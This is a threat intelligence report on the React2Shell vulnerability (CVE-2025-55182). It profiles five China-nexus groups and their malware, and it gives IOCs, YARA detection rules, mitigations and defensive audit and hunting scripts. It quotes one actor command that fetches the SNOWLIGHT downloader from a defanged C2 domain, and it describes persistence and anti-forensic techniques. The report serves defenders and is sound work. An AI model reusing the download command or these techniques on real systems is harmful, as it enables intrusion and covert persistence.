
CVE-2025-55182 React2Shell: Chinese APT Groups Exploit Critical React Server Components Vulnerability for Malware Delivery

  • Rescana
  • 20 hours ago
  • 8 min read



Rescana Threat Intelligence Report: Google Sees 5 Chinese Groups Exploiting React2Shell (CVE-2025-55182) for Malware Delivery

Date: December 2025
Prepared by: Rescana OSINT Cybersecurity Research Team
Primary Sources: Google Threat Intelligence Group, AWS, SecurityWeek, NVD, Wiz, Trend Micro


Executive Summary

On December 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components, tracked as CVE-2025-55182 ("React2Shell"), was publicly disclosed. Google Threat Intelligence Group (GTIG) and AWS have since observed at least five China-nexus threat clusters exploiting this vulnerability to deliver a range of malware, including tunneling tools, backdoors, and cryptominers. The attacks are global, with a focus on cloud infrastructure and web servers running vulnerable React/Next.js components.


Vulnerability Details

  • CVE: CVE-2025-55182

  • CVSS v3.x Score: 10.0 (Critical)

  • CVSS v4 Score: 9.3

  • Attack Vector: Unauthenticated attackers can send a single HTTP request to execute arbitrary code with the privileges of the web server process.

  • Exploit Availability: Multiple PoCs, including Unicode-obfuscated and in-memory web shell variants, are circulating. Some PoCs are non-functional or malicious.

Complete List of Affected Product Versions

The following React Server Component packages and versions are confirmed vulnerable to CVE-2025-55182:

  • react-server-dom-webpack (versions 19.0, 19.1.0, 19.1.1, 19.2.0)

  • react-server-dom-parcel (versions 19.0, 19.1.0, 19.1.1, 19.2.0)

  • react-server-dom-turbopack (versions 19.0, 19.1.0, 19.1.1, 19.2.0)

Note: The presence of these packages in a project is sufficient for exploitation, even if not directly used.
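Because a vulnerable copy can be pulled in transitively by a framework rather than imported directly, the dependency check has to cover the whole lockfile tree. The following is an added example (not tooling from the report or any of its cited sources) that audits an npm package-lock.json for the three packages and versions listed above; the report's "19.0" is 19.0.0 in semver, and the sample lockfile, including the some-framework package in it, is constructed.

```python
import json
from pathlib import Path

# Affected packages and versions as listed in the report ("19.0" is 19.0.0 in semver).
AFFECTED_PACKAGES = {"react-server-dom-webpack", "react-server-dom-parcel", "react-server-dom-turbopack"}
VULNERABLE_VERSIONS = {"19.0.0", "19.1.0", "19.1.1", "19.2.0"}

def _walk_v1(deps, prefix=""):
    """Recurse through a lockfileVersion 1 'dependencies' tree (nested node_modules)."""
    for name, meta in deps.items():
        path = f"{prefix}node_modules/{name}"
        yield name, meta.get("version", ""), path
        yield from _walk_v1(meta.get("dependencies", {}), path + "/")

def iter_installed(lock):
    """Yield (name, version, install path) for every package recorded in an npm lockfile."""
    if "packages" in lock:                      # lockfileVersion 2 or 3
        for path, meta in lock["packages"].items():
            if not path:                        # "" is the root project, not a dependency
                continue
            name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
            yield name, meta.get("version", ""), path
    else:                                       # lockfileVersion 1
        yield from _walk_v1(lock.get("dependencies", {}))

def audit_lock(lock):
    """Flag every copy of an affected package, whether top-level or pulled in transitively."""
    findings = []
    for name, version, path in iter_installed(lock):
        if name in AFFECTED_PACKAGES:
            status = "VULNERABLE" if version in VULNERABLE_VERSIONS else "not in affected list (verify)"
            findings.append({"package": name, "version": version, "path": path, "status": status})
    return findings

def audit_lockfile(lockfile_path):
    """Audit a package-lock.json on disk."""
    return audit_lock(json.loads(Path(lockfile_path).read_text()))

# Constructed lockfile (not a real project): a framework dependency pulls in a vulnerable nested
# copy of react-server-dom-webpack while the top-level react-server-dom-parcel is already patched.
SAMPLE_LOCK = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/some-framework": {"version": "0.0.1"},
        "node_modules/some-framework/node_modules/react-server-dom-webpack": {"version": "19.2.0"},
        "node_modules/react-server-dom-parcel": {"version": "19.2.3"},
    },
}
```

Run audit_lockfile("package-lock.json") in each project; any finding marked VULNERABLE needs the upgrade described under Mitigation, and a copy that is "not in affected list" should still be verified against the vendor advisory.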


Exploitation in the Wild

China-Nexus Threat Groups

Google and AWS identified at least five China-nexus clusters exploiting React2Shell:

1. UNC6600 (Espionage)

  • Malware: MINOCAT tunneler

  • TTPs:

    • Bash script creates the hidden directory $HOME/.systemd-utils

    • Kills ntpclient processes

    • Downloads and persists MINOCAT via cron, systemd, and shell config injection

    • MINOCAT is a 64-bit ELF with an embedded Fast Reverse Proxy (FRP) client

2. UNC6586 (Espionage/Unknown)

  • Malware: SNOWLIGHT downloader (part of VSHELL backdoor)

  • TTPs:

    • Uses curl or wget to fetch and execute SNOWLIGHT

    • SNOWLIGHT retrieves further payloads from C2 (e.g., reactcdn.windowserrorapis[.]com)

    • Example command:

      curl -fsSL -m180 https://reactcdn.windowserrorapis[.]com:443/?h=reactcdn.windowserrorapis[.]com&p=443&t=tcp&a=l64&stage=true -o <filename>

3. UNC6588 (Espionage/Unknown)

  • Malware: COMPOOD backdoor

  • TTPs:

    • Downloads COMPOOD masquerading as Vim via wget

    • Executes as /tmp/vim "/usr/lib/polkit-1/polkitd --no-debug"

  • COMPOOD previously linked to China-nexus espionage in Taiwan, Vietnam, and China

4. UNC6603 (Cloud Infrastructure Targeting)

  • Malware: HISONIC backdoor (Go-based)

  • TTPs:

    • Uses Cloudflare Pages and GitLab for encrypted config retrieval

    • XOR-encoded config between the markers 115e1fc47977812 and 725166234cf88gxx

  • Targets AWS and Alibaba Cloud in APAC

5. UNC6595 (VPS Targeting)

  • Malware: ANGRYREBEL.LINUX

  • TTPs:

    • Installs as a fake OpenSSH daemon in /etc/

  • Uses timestomping and clears shell history for anti-forensics

Financially Motivated Actors

  • Malware: XMRig cryptominer

  • TTPs:

    • Downloads and executes the sex.sh script to install XMRig

    • Establishes persistence via the systemd service system-update-service


Indicators of Compromise (IOCs)

| Type | Value/Description | Associated Malware/Actor |
|------|-------------------|--------------------------|
| Domain | reactcdn.windowserrorapis[.]com | SNOWLIGHT C2 |
| IP | 82.163.22[.]139 | SNOWLIGHT C2 |
| IP | 216.158.232[.]43 | Staging for sex.sh |
| IP | 45.76.155[.]14 | COMPOOD C2/Payload |
| SHA256 | df3f20a961d29eed46636783b71589c183675510737c984a11f78932b177b540 | HISONIC sample |
| SHA256 | 92064e210b23cf5b94585d3722bf53373d54fb4114dca25c34e010d0c010edf3 | HISONIC sample |
| SHA256 | 0bc65a55a84d1b2e2a320d2b011186a14f9074d6d28ff9120cb24fcc03c3f696 | ANGRYREBEL.LINUX |
| SHA256 | 13675cca4674a8f9a8fabe4f9df4ae0ae9ef11986dd1dcc6a896912c7d527274 | XMRIG Downloader (sex.sh) |
| SHA256 | 7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a | SNOWLIGHT sample |
| SHA256 | 776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec530f4273 | MINOCAT sample |


MITRE ATT&CK Mapping

  • Initial Access: Exploit Public-Facing Application (T1190)

  • Execution: Command and Scripting Interpreter (T1059), Scheduled Task/Job (T1053)

  • Persistence: Boot or Logon Initialization Scripts (T1037), Systemd Service (T1543.002), Cron (T1053.003)

  • Defense Evasion: Masquerading (T1036), Timestomp (T1070.006), Clear Command History (T1070.003)

  • Command and Control: Application Layer Protocol (T1071), Web Service (T1102)

  • Impact: Resource Hijacking (T1496) [for cryptomining]



YARA Rules (from Google GTIG)

MINOCAT:

```yara
rule G_APT_Tunneler_MINOCAT_1 {
    meta:
        author = "Google Threat Intelligence Group (GTIG)"
        date_modified = "2025-12-10"
        rev = "1"
        md5 = "533585eb6a8a4aad2ad09bbf272eb45b"
    strings:
        $magic = { 7F 45 4C 46 }
        $decrypt_func = { 48 85 F6 0F 94 C1 48 85 D2 0F 94 C0 08 C1 0F 85 }
        $xor_func = { 4D 85 C0 53 49 89 D2 74 57 41 8B 18 48 85 FF 74 }
        $frp_str1 = "libxf-2.9.644/main.c"
        $frp_str2 = "xfrp login response: run_id: [%s], version: [%s]"
        $frp_str3 = "cannot found run ID, it should inited when login!"
        $frp_str4 = "new work connection request run_id marshal failed!"
        $telnet_str1 = "Starting telnetd on port %d\n"
        $telnet_str2 = "No login shell found at %s\n"
        $key = "bigeelaminoacow"
    condition:
        $magic at 0 and (1 of ($decrypt_func, $xor_func)) and (2 of ($frp_str*)) and (1 of ($telnet_str*)) and $key
}
```

COMPOOD:

```yara
rule G_Backdoor_COMPOOD_1 {
    meta:
        author = "Google Threat Intelligence Group (GTIG)"
        date_modified = "2025-12-11"
        rev = "1"
        md5 = "d3e7b234cf76286c425d987818da3304"
    strings:
        $strings_1 = "ShellLinux.Shell"
        $strings_2 = "ShellLinux.Exec_shell"
        $strings_3 = "ProcessLinux.sendBody"
        $strings_4 = "ProcessLinux.ProcessTask"
        $strings_5 = "socket5Quick.StopProxy"
        $strings_6 = "httpAndTcp"
        $strings_7 = "clean.readFile"
        $strings_8 = "/sys/kernel/mm/transparent_hugepage/hpage_pmd_size"
        $strings_9 = "/proc/self/auxv"
        $strings_10 = "/dev/urandom"
        $strings_11 = "client finished"
        $strings_12 = "github.com/creack/pty.Start"
    condition:
        uint32(0) == 0x464C457f and 8 of ($strings_*)
}
```

SNOWLIGHT:

```yara
rule G_Hunting_Downloader_SNOWLIGHT_1 {
    meta:
        author = "Google Threat Intelligence Group (GTIG)"
        date_created = "2025-03-25"
        date_modified = "2025-03-25"
        md5 = "3a7b89429f768fdd799ca40052205dd4"
        rev = 1
    strings:
        $str1 = "rm -rf $v"
        $str2 = "&t=tcp&a="
        $str3 = "&stage=true"
        $str4 = "export PATH=$PATH:$(pwd)"
        $str5 = "curl"
        $str6 = "wget"
        $str7 = "python -c 'import urllib"
    condition:
        all of them and filesize < 5KB
}
```



Conclusion

CVE-2025-55182 (React2Shell) is being actively exploited by multiple China-nexus APT groups and financially motivated actors. The attacks are sophisticated, leveraging a range of malware and post-exploitation techniques. Organizations using React Server Components or Next.js should patch immediately, monitor for IOCs, and review system and network logs for signs of compromise.

For further assistance or threat intelligence services, contact Rescana.



Executive Summary

A critical remote code execution vulnerability, CVE-2025-55182 (commonly referred to as React2Shell), has been weaponized in the wild by at least five distinct China-nexus threat groups, as reported by Google Threat Intelligence Group and corroborated by multiple industry sources. The vulnerability affects several versions of React Server Components and related packages, enabling unauthenticated attackers to execute arbitrary code on vulnerable servers via a single HTTP request. The exploitation campaign is notable for its rapid adoption by advanced persistent threat (APT) actors, the diversity of malware payloads delivered—including tunneling tools, backdoors, and cryptominers—and the global scope of targeting, with a particular focus on cloud infrastructure and web-facing assets. Immediate patching and comprehensive threat hunting are strongly advised for all organizations utilizing affected React components.

Threat Actor Profile

The exploitation of React2Shell has been attributed to at least five China-nexus threat clusters, each exhibiting distinct tactics, techniques, and procedures (TTPs) and malware toolsets. These groups, tracked by Google and AWS as UNC6600, UNC6586, UNC6588, UNC6603, and UNC6595, are primarily engaged in cyber espionage and infrastructure compromise. Their operations demonstrate a high degree of technical sophistication, including the use of custom tunneling malware (MINOCAT), advanced backdoors (COMPOOD, HISONIC), and anti-forensic techniques such as timestomping and shell history clearing. In addition to state-aligned actors, financially motivated groups have exploited the vulnerability to deploy cryptomining malware (XMRig), indicating broad criminal interest in the exploit.

Technical Analysis of Malware/TTPs

The exploitation chain begins with the delivery of a single, unauthenticated HTTP request to a vulnerable React Server Component endpoint. This request leverages the deserialization flaw in the affected packages—react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack (versions 19.0, 19.1.0, 19.1.1, and 19.2.0)—to achieve arbitrary code execution in the context of the web server process.

Once access is gained, threat actors deploy a variety of payloads:

MINOCAT (UNC6600) is a 64-bit ELF binary with embedded Fast Reverse Proxy (FRP) client functionality. It is typically installed via a bash script that creates a hidden directory ($HOME/.systemd-utils), terminates time synchronization processes (ntpclient), and establishes persistence through cron jobs, systemd services, and shell configuration file injection. MINOCAT enables covert tunneling of attacker traffic into the compromised environment.

SNOWLIGHT (UNC6586) is a lightweight downloader, often fetched using curl or wget commands. It retrieves additional payloads from command-and-control (C2) infrastructure such as reactcdn.windowserrorapis[.]com. The downloader is associated with the VSHELL backdoor family and is used to stage further implants or tools.

COMPOOD (UNC6588) masquerades as a legitimate binary (e.g., Vim) and is executed with parameters mimicking system processes. It is linked to prior espionage campaigns in East Asia and provides remote shell access, file exfiltration, and proxy capabilities.

HISONIC (UNC6603) is a Go-based backdoor that retrieves encrypted configuration data from public cloud services, including Cloudflare Pages and GitLab. The configuration is XOR-encoded and delimited by unique markers, complicating detection. HISONIC is tailored for cloud infrastructure targeting, particularly AWS and Alibaba Cloud assets.
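For analysts who have retrieved one of these hosted pages, the following added example (not part of the report or of GTIG's tooling) pulls out the span between the two reported markers and XOR-decodes it. The hex encoding of the blob, the JSON shape of the decoded configuration, and the sample page and key are assumptions, since the report states none of them; the single-byte key recovery, which keeps whichever key yields parseable JSON, also goes beyond what the report describes.

```python
import binascii
import json

# Markers reported by GTIG as delimiting the XOR-encoded HISONIC configuration.
START_MARKER = b"115e1fc47977812"
END_MARKER = b"725166234cf88gxx"

def extract_blob(page):
    """Return the bytes between the two markers, or None if either marker is absent."""
    start = page.find(START_MARKER)
    if start < 0:
        return None
    start += len(START_MARKER)
    end = page.find(END_MARKER, start)
    return None if end < 0 else page[start:end].strip()

def xor_bytes(data, key):
    """Repeating-key XOR; encoding and decoding are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def parse_json_config(raw):
    """Assumption: the decoded config is ASCII JSON. Returns the parsed value or None."""
    try:
        return json.loads(raw.decode("ascii"))
    except ValueError:
        return None

def decode_config(page, key):
    """Extract the marker-delimited blob (assumed hex text), XOR it with key, parse as JSON."""
    blob = extract_blob(page)
    if blob is None:
        return None
    try:
        return parse_json_config(xor_bytes(binascii.unhexlify(blob), key))
    except binascii.Error:
        return None

def candidate_single_byte_keys(page):
    """Keys 0-255 whose output parses as JSON: recovers an unknown single-byte key."""
    return [k for k in range(256) if decode_config(page, bytes([k])) is not None]

# Constructed sample: a fake hosted page carrying a JSON config XOR-encoded with key 0x5a.
SAMPLE_CONFIG = b'{"c2":"c2.example.invalid:443","sleep":30}'
SAMPLE_KEY = bytes([0x5A])
SAMPLE_PAGE = (b"<html><body>nothing to see " + START_MARKER
               + binascii.hexlify(xor_bytes(SAMPLE_CONFIG, SAMPLE_KEY))
               + END_MARKER + b"</body></html>")
```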

ANGRYREBEL.LINUX (UNC6595) is a persistence-focused implant that installs itself as a fake OpenSSH daemon in /etc/, employs timestomping to evade forensic analysis, and clears shell history to hinder incident response.

Financially motivated actors have deployed XMRig cryptominer via a shell script (sex.sh), establishing persistence through a systemd service named system-update-service.

The exploitation ecosystem is further complicated by the proliferation of public and private proof-of-concept (PoC) exploits, some of which are obfuscated or contain embedded web shells, increasing the risk of opportunistic attacks.

Exploitation in the Wild

Within hours of public disclosure, exploitation of React2Shell was observed at scale. Google and AWS telemetry indicate that the five China-nexus clusters rapidly adapted their toolchains to leverage the vulnerability, targeting a wide array of internet-facing assets. The attacks are characterized by:

  • Automated scanning for vulnerable endpoints, often using custom reconnaissance scripts.

  • Immediate deployment of first-stage payloads (e.g., MINOCAT, SNOWLIGHT) to establish initial foothold and persistence.

  • Lateral movement and privilege escalation, facilitated by the deployment of backdoors and tunneling tools.

  • Use of anti-forensic measures, including timestomping, shell history clearing, and masquerading of malicious binaries as legitimate system processes.

  • Exfiltration of sensitive data and, in some cases, deployment of cryptomining software to monetize access.

The exploitation is not limited to high-profile targets; opportunistic attacks against smaller organizations and unmanaged cloud infrastructure have also been reported. The availability of multiple PoCs, including those with Unicode obfuscation and in-memory execution, has lowered the barrier to entry for less sophisticated actors.

Victimology and Targeting

The targeting profile for React2Shell exploitation is broad, encompassing organizations across North America, Europe, and the Asia-Pacific region. Sectors most affected include cloud service providers (AWS, Alibaba Cloud), managed service providers, technology companies, and any enterprise deploying React or Next.js applications with vulnerable server components. Notably, international VPS providers and general web infrastructure are also at risk, as are organizations in Taiwan, Vietnam, and China, reflecting the geopolitical interests of the identified threat clusters.

The attacks are not limited to large enterprises; small and medium-sized businesses with exposed React infrastructure are equally vulnerable. The diversity of malware payloads suggests both espionage and financially motivated objectives, with some actors focusing on data exfiltration and others on resource hijacking for cryptomining.

Mitigation and Countermeasures

Immediate action is required to mitigate the risk posed by CVE-2025-55182. Organizations should:

  • Upgrade all affected React Server Component packages to the latest patched versions (at least 19.0.1, 19.1.2, or 19.2.1; full coverage is provided by 19.2.2 or 19.2.3).

  • Audit all applications and dependencies for the presence of vulnerable react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack packages, even if not directly imported.

  • Deploy or update web application firewall (WAF) rules to detect and block exploitation attempts, leveraging managed rulesets from providers such as Google Cloud Armor.

  • Monitor network traffic for anomalous outbound connections, particularly to known C2 domains and IPs associated with SNOWLIGHT, COMPOOD, and MINOCAT.

  • Conduct threat hunting for indicators of compromise, including hidden directories (e.g., $HOME/.systemd-utils), unauthorized process terminations, suspicious cron jobs, and systemd service modifications.

  • Utilize the provided YARA rules to scan for known malware samples on endpoints and servers.

  • Review system and application logs for evidence of exploitation, such as unexpected HTTP requests to React endpoints or execution of shell commands by the web server process.

  • Isolate and reimage compromised systems where necessary, and reset credentials for affected accounts.
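The host-level part of that hunt, as an added example that is not tooling from the report or its sources: it checks for the hidden directory, shell-config injection, and cron and systemd persistence named in the report, and for ELF binaries dropped directly into /etc/ where a fake OpenSSH daemon would sit. The demo_root() fixture is constructed test data; hunt("/") on a live host needs root to read everything, and an ELF in /etc/ is a lead to examine, not a verdict.

```python
import tempfile
from pathlib import Path

MARKER = ".systemd-utils"             # hidden directory created by the UNC6600 MINOCAT script
UNIT_NAME = "system-update-service"   # systemd service used for XMRig persistence
RC_FILES = (".bashrc", ".bash_profile", ".profile", ".zshrc")

def _files_in(*dirs):
    """Regular files directly inside each directory that exists (no recursion)."""
    for d in dirs:
        if d.is_dir():
            yield from (p for p in d.iterdir() if p.is_file())

def _read(path):
    try:                                       # unreadable or missing files count as empty
        return path.read_bytes() if path.is_file() else b""
    except OSError:
        return b""

def hunt(root="/"):
    """Return findings for the host-level persistence artefacts described in the report."""
    root, findings, marker = Path(root), [], MARKER.encode()
    for h in [root / "root", *((root / "home").iterdir() if (root / "home").is_dir() else [])]:
        if (h / MARKER).is_dir():                                   # hidden staging directory
            findings.append(f"hidden directory: {h / MARKER}")
        for rc in RC_FILES:                                         # shell config injection
            if marker in _read(h / rc):
                findings.append(f"shell rc references {MARKER}: {h / rc}")
    for unit in _files_in(root / "etc/systemd/system"):             # systemd persistence
        if unit.suffix == ".service" and (unit.stem == UNIT_NAME or marker in _read(unit)):
            findings.append(f"suspicious systemd unit: {unit}")
    for cron in [root / "etc/crontab", *_files_in(root / "etc/cron.d", root / "var/spool/cron", root / "var/spool/cron/crontabs")]:
        if marker in _read(cron):                                   # cron persistence
            findings.append(f"cron entry references {MARKER}: {cron}")
    for f in _files_in(root / "etc"):                               # ELF dropped directly into /etc/
        if _read(f)[:4] == b"\x7fELF":
            findings.append(f"ELF binary in /etc (fake daemon?): {f}")
    return findings

def demo_root():                       # constructed fake filesystem root, one of each artefact
    root = Path(tempfile.mkdtemp())
    (root / "home/alice" / MARKER).mkdir(parents=True)
    (root / "home/alice/.bashrc").write_text(f"export PATH=$PATH:$HOME/{MARKER}\n")
    (root / "etc/systemd/system").mkdir(parents=True)
    (root / f"etc/systemd/system/{UNIT_NAME}.service").write_text("[Service]\nExecStart=/tmp/miner\n")
    (root / "etc/cron.d").mkdir()
    (root / "etc/cron.d/update").write_text(f"* * * * * root $HOME/{MARKER}/agent\n")
    (root / "etc/sshd").write_bytes(b"\x7fELF" + bytes(16))      # ELF magic only, not a real binary
    (root / "etc/hostname").write_text("host\n")                  # benign file, must not be flagged
    return root
```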

References

Google Threat Intelligence Blog: https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182

AWS Security Blog: https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/

Trend Micro Analysis: https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-itw.html

Wiz Blog: https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182

SecurityWeek Coverage: https://www.securityweek.com/google-sees-5-chinese-groups-exploiting-react2shell-for-malware-delivery/

NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

GitHub PoC Repository (ejpir): https://github.com/ejpir/react2shell-poc

About Rescana

Rescana delivers advanced third-party risk management (TPRM) solutions, empowering organizations to continuously monitor, assess, and mitigate cyber risks across their digital supply chain. Our platform leverages real-time threat intelligence, automated risk scoring, and deep visibility into vendor ecosystems, enabling proactive defense against emerging threats. For more information about how Rescana can help secure your organization’s digital assets and supply chain, we are happy to answer questions at ops@rescana.com.
